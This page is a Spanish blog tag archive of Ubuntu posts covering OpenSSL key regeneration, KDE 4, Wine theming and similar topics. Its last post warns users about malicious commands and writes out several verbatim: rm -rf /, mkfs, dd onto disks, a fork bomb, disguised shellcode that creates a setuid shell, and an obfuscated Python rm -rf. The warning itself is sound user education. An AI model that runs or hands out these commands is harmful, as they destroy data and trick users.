Entradas con el Tag ‘Ubuntu’

Haz click sobre uno de los elementos de abajo para ir a la entrada

Grave vulnerabilidad en los paquetes OpenSSL de Debian

El desarrollador Luciano Bello ha descubierto una vulnerabilidad en el generador de números aleatorios usado por OpenSSL en Debian y otras distribuciones basadas en ella como Ubuntu.

Debido a esto, algunas claves de encriptación usadas en OpenSSH, OpenVPN o certificados SSL podrían ser mucha más comunes de lo que deberían ser y alguien podría averiguarlas mediante un ataque de fuerza bruta. De poco sirve blindar OpenSSH con bugs así…

Al margen del debate surgido acerca de si el fallo está o no solucionado, nos centraremos en la solución más inmediata para OpenSSH que pasa por averiguar si nuestras claves actuales están comprometidos y como regenerarlas en ese caso.

Las versiones de Debian afectadas por el fallo son etch, lenny y sid, en Ubuntu lo están la 7.04, 7.10 y 8.04, así que tenéis alguna de ellas instalada, actualizad como primera medida para disponer de la versión corregida de OpenSSL:

$ sudo aptitude update && sudo aptitude upgrade

Podemos averiguar si alguna de las claves de nuestro sistema está comprometida con una nueva herramienta incluida en la actualización:

$ sudo ssh-vulnkey -a

Si alguna de ellas figura como “COMPROMISED” procederemos a regenerarlas para nuestro usuario:

$ ssh-keygen

Y, en caso de necesitarlo, para el servidor OpenSSH:

$ sudo rm /etc/ssh/ssh_host_{dsa,rsa}_key*
$ sudo dpkg-reconfigure -plow openssh-server

Con esto debería valer por el momento. Si os va el tema, podéis ver como en Slashdot se pone verde a algunos desarrolladores 😈

Más información: DebianUbuntu

¿Portátil con Ubuntu? no lo creo…

Mirad la curiosa publicidad que me ha llegado hoy al email:

Publicidad ubuntera

Pulsa en la imagen para ver el folleto completo

Jejeje, parece que el logo de Ubuntu tiene éxito, dentro de nada lo vemos en las cajas de productos de Microsoft 😈

Nada más verlo he soltado un “OMG, ¡al fin portátiles nuevos de marca con Ubuntu preinstalado en España!”, vaya chasco, otra vez será.

slurm – Monitorizando tu interfaz de red

slurm - Monitorizando la red

slurm, un sencillo programa de consola que nació como un port de pppstatus para FreeBSD, nos muestra datos de nuestra interfaz de red en tiempo real junto con una simpática gráfica en ASCII.

Para instalarlo en Ubuntu, nada más fácil que ejecutar el típico

sudo aptitude install slurm

Y listo. Para monitorizar, por ejemplo, mi interfaz de red eth0, ejecuto el siguiente comando:

slurm -i eth0

Sin duda un programa útil y ligero para su uso en servidores.

Fuente: Ubuntu Geek

Ubuntu brainstorm – Comparte tus ideas

¿Harto de maldecir cuando tu conexión wireless no funciona después de suspender o hibernar tu PC con Ubuntu?, ¿tienes una idea que puede mejorar tu distribución de GNU/Linux favorita? Ahora ya tienes un sitio donde expresarte.

Ubuntu brainstorm

Ubuntu brainstorm nace para que los desarrolladores conozcan de primera mano nuevas ideas surgidas de la comunidad de usuarios ordenándolas por popularidad en base a votos positivos o negativos.

Por el momento lo más votado es arreglar el soporte para las funciones de suspender e hibernar y facilitar una herramienta que aglutine la configuración de todo tipo de redes (wireless, cableada, bluetooth…).

Como curiosidad (sic, frikada), las ideas más impopulares son usar más RAM y cambiar Firefox por Epiphany. Mención especial merecen otras como ayuda para los usuarios de XP o cambiar el nombre para añadirle GNU/Linux, los discípulos de RMS vigilan 😀 .

Por el momento no veo que nadie haya propuesto cambiar Gnome por KDE en la distribución principal, ánimo, amigos de los flames 😈 .

Fuente: Cesarius Revolutions

Instalando KDE 4.0 en Ubuntu

El pasado día 11 de enero se lanzó la cuarta versión del K Desktop Environment, más conocido como KDE.

KDE 4.0

Todavía estoy por ver un buen uso de las transparencias

Esta última revisión trae multitud de novedades tales como el uso de Qt 4, un nuevo gestor de ficheros, mayor soporte para sistemas multi núcleo… Para conocer más detalles podéis realizar un tour gráfico.

Para instalarlo en Ubuntu 7.10 seguid los siguientes pasos:

  • Editamos el fichero /etc/apt/sources.list:

sudo gedit /etc/apt/sources.list

  • Añadimos al final la siguiente línea:
deb http://ppa.launchpad.net/kubuntu-members-kde4/ubuntu gutsy main

Guardamos y cerramos.

  • Actualizamos las fuentes con el siguiente comando:

sudo aptitude update

Con esto ya tenemos el nuevo repositorio listo para ser usado, por lo que procedemos con la instalación.

  • Borramos cualquier rastro de versiones previas:

sudo aptitude remove kdelibs5 kde4base-data kde4libs-data

  • Instalamos KDE 4:

sudo aptitude install kde4-core

¡Listo!, ahora podremos arrancar una sesión desde la pantalla de login.

Si no queréis instalarlo (u os da pereza 😛 ) podéis probarlo antes descargando el siguiente live CD de openSUSE, que también podéis arrancar con VMware, QEMU… (por si tampoco os apetece reiniciar, ya más no se puede hacer 😀 )

Live CD con KDE 4.0 (512 MB)
Descarga directa / Torrent

Fuente: Ubuntu Geek

Ubuntu Tweak – Configuración sencilla

Ubuntu Tweak es una aplicación diseñada para GNOME que nos permite configurar fácilmente algunas opciones de la distribución de GNU/Linux homónima.

Ubuntu Tweak

Pese a estar en inglés su manejo es simple

Esto es todo lo que nos permite hacer:

  • Ver información del sistema (Distribución, Kernel, CPU, Memoria, etc.)
  • Control de sesión de GNOME.
  • Mostrar/Ocultar y cambiar la pantalla de inicio de GNOME.
  • Mostrar/Ocultar iconos y volúmenes montados en el escritorio.
  • Mostrar/Ocultar/Renombrar los iconos de mi pc, home y papelera del escritorio.
  • Configurar el estilo y comportamiento del gestor de ventanas Metacity.
  • Configurar Compiz Fusion, las esquinas de la pantalla (ejecuta una acción al acercarse a ellas), efectos de las ventanas y efectos del menú.
  • Ajustes del panel de GNOME.
  • Ajustes de Nautilus.
  • Ajustes avanzados de gestión de energía.
  • Ajustes de seguridad del sistema.

Me parece una herramienta muy útil ya con ella podemos configurar opciones sólo accesibles a través de gconf, como por ejemplo ocultar o renombrar los iconos de home, papelera… que se muestran por defecto en el escritorio.

Podéis instalarlo siguiendo el enlace de abajo y abriendo el fichero *.deb con GDebi.

Fuente: lifehacker

Mejorando la apariencia de Wine

Cuando tenemos que resignarnos a usar algún programa de Windows nos damos cuenta del horrible aspecto de Wine en comparación con nuestro tema de escritorio.

Wine tema por defecto

Recuerda a los malos años con el Windows 95

Vamos a mostrar una solución para cambiar el esquema de colores de Wine. En la versión 8.04 de Ubuntu es posible que estos cambios se incluyan por defecto, si no puedes esperar más o usas otra distribución, adelante.

En este ejemplo adaptaremos Wine al tema por defecto de Ubuntu, Human.

Wine esquema Human

Wine con el esquema de color del tema Human de Ubuntu

Tenemos que modificar el registro situado en ~/.wine/user.reg, la ~ (Alt Gr + ñ) equivale a nuestra home en GNU/Linux, así que lo abrimos:

gedit ~/.wine/user.reg

Y pegamos el contenido de este fichero sobre el campo [Control Panel\Colors], que debería estar vacio.

¡Ya está!, todavía se podría mejorar más usando un tema para Wine, pero funcionan realmente mal ahora mismo, fijaos que bien queda.

Wine con tema ClearLooks

Wine con tema ClearLooks

Si aun así queréis probarlo seguid estos pasos:

  • Descargamos el tema ClearLooks para Windows XP.
  • Lo descomprimimos y ejecutamos winecfg.
  • Ahora nos vamos a la pestaña Integración de escritorio y hacemos click en Instalar tema.
  • Seleccionamos el fichero ClearLooks.msstyles y seleccionamos ClearLooks en la opción Tema.

Bonito, pero inútil debido a su extrema lentitud.

Si tras este cambio no puedes quitar el tema de lo lento que va winecfg, borra el fichero ~/.wine/user.reg para volver al tema por defecto.

Esperemos que el equipo de desarrollo de Wine siga trabajando para mejorarlo y, sobretodo, ojalá no tuviéramos necesidad de esta fantástica aplicación…

Visto en
: Digg
Fuente: Tombuntu

Lanzada la Alpha 1 de Ubuntu 8.04 "Hardy Heron"

El pasado día 30 de Noviembre se lanzó la primera Alpha de lo que será la nueva versión de Ubuntu, la popular distribución de GNU/Linux basada en Debian, bautizada como “Hardy Heron“, su lanzamiento oficial está previsto para Abril del 2008.

Este nueva versión contará con la denominación Long Term Support (LTS), o soporte a largo plazo (de ahí el nombre de “Garza Resistente“, que por una vez tiene algo que ver con las características), por lo que podremos disfrutar de actualizaciones de seguridad en servidores durante 5 años y 3 para la versión de escritorio, la verdad es que yo soy incapaz de estar tanto tiempo sin cambiar de versión 😛 , pero bueno, así se puede hacer un mejor aprovechamiento del hardware, que no se queda anticuado tan pronto. La anterior versión con esta denominación fue la 6.06, conocida como “Dapper Drake“.

Versiones de Ubuntu

Diversas versiones de Ubuntu en CD

Algunas de las posibles novedades (si da tiempo a desarrollarlas y/o son aceptadas) que traerá, de todas las propuestas, son las siguientes:

  • Xorg 7.3, con mejoras en la configuración, que tantos problemas ha dado en el pasado.
  • Instalador desde Windows, supongo que unirán esfuerzos con el prototipo ya disponible para “Feisty Fawn“.
  • El uso de Prefetch para mejorar el tiempo de arranque del sistema y sus aplicaciones.
  • Más libertad para elegir entre diversos perfiles para optimizar el consumo de batería en portátiles, por ejemplo, reduciendo los efectos de compiz fusion.
  • Mejora de la detección de hardware, esto es algo que debería estar en desarrollo perpetuo.
  • Mejora del “Añadir y quitar” usado para instalar aplicaciones incluyendo ordenar por antigüedad, screenshots, reviews… Promocionar la facilidad de instalación de nuevas aplicaciones me parece una de las cosas más interesantes para competir con Windows y sus aplicaciones de pago (o crackeadas 😈 )
  • Cuando no tenemos permisos para realizar alguna acción desde el gestor de ficheros, por ejemplo, al copiar un fichero a /usr, poder realizar la acción con “sudo”, y para ello incluir esta opción en la ventana emergente en vez de sólo mostrar un mensaje de error.
  • Un nuevo theme, iconos y, quizás, menú.

Si queréis proponer más ideas podéis agregarlas directamente a los “Blueprints” o discutirlas en este post del foro.

Para probarla podéis descargarla o seguir las indicaciones de este artículo del wiki, para actualizar desde la 7.10 ejecutar lo siguiente:

sudo update-manager -d

Hay que tener en cuenta que se trata de una versión Alpha y por lo tanto no es recomendable su instalación en una máquina en producción, a no ser que seas un amante de las emociones fuertes 🙂 , yo por el momento seguiré con la todavía reciente Gutsy Gibbon.

Fuentes: The Inquirer y ubuntu-es

Comandos maliciosos en Linux

El otro día postearon un anuncio en el foro de Ubuntu advirtiendo de que algunos usuarios estaban incluyendo comandos maliciosos en sus posts, como es un tema que me parece cuanto menos curioso voy a tratar de recopilar algunos de ellos junto con sus (potencialmente peligrosos) efectos:

¡Cuidado! Estos comandos podrían dejar tu sistema inservible, borrar tu disco duro o asustar a tu abuelita, así que será mejor que no los uses.

rm -rf /
rm -rf .
rm -rf *

rm (borrar), -r (recursivo), f (forzar, sin confirmación). Todo un clásico, borrar todo, el directorio actual o todos los ficheros visibles del directorio actual, si ejecutas el primero como root, ¿hasta dónde llegará antes de petar?, creo que me quedaré con la duda…

mkfs
mkfs.ext3
mkfs.lo_que_sea

mkfs (crea un sistema de ficheros). Reformatea lo que viene después del comando creando en su lugar un sistema de ficheros nuevo y limpio.

cualquier_comando > /dev/sda
dd if=algo of=/dev/sda

Esto escribe información en un dispositivo directamente ignorando el sistema de ficheros, que probablemente acabará corrompiéndose.

:(){:|:&};:

Una bomba fork que satura la tabla de procesos del sistema, fácilmente evitable.

Ficheros comprimidos que cuando se descomprimen te inundan el sistema de archivos, te dejan sin espacio en el disco, o te sobreescriben ficheros.

Scripts o programas creados por gente malvada, hay que leer el código fuente de cualquier cosa descargada de una fuente no fiable o cruzar los dedos y encomendarse a Dios mientras se ejecuta (la efectividad de este método no está probada). Como ejemplo, el mensaje en una lista de correo que ofrecía un programilla en C para aprovecharse de un exploit del comando sudo, veamos la parte interesante del mismo:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Esto trozo de código hexadecimal ejecuta un bonito rm -rf ~ / &, borraremos nuestro home y si somos root todo el disco, bonito atrapa script kiddies 😈

Hay que tener cuidado en especial al tocar otros comandos como chmod, chown y chgrp que alteran los permisos, propietario y grupo de los ficheros ya que podríamos conceder acceso a cualquiera o dejar el sistema hecho un desastre si se aplican de forma recursiva sin control.

También recordar que todos estos comandos se pueden ejecutar mediante scripts en lenguajes como python, por ejemplo este código:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Ejecuta un rm -rf * oculto tras el “sn!.sg!+”.

Consejos para evitar cargarnos nuestro propio sistema:

  • Aprender los comandos básicos de Linux, si vamos a ejecutar algo mirar qué hace con man.
  • Sólo ejecutar código proporcionado en sitios fiables y aun así mirar qué hace, así aprenderemos, que nunca está de más.
  • Tener un poco de sentido común, si vemos a alguien diciendo “¡Ej3cu74 3st0 y t3ndr4s 4cc3so0 i1im174d0 al ord3n4d0r d3 14 NASA!” no te enfundes tu sombrero de juanker y empieces a copy/pastear.

Eso es todo, Linux es un sistema bastante seguro pero su consola tiene un gran poder, y como ya decía Spiderman, esto debe conllevar una gran responsabilidad por parte del usuario.

Fuente: Ubuntu Forums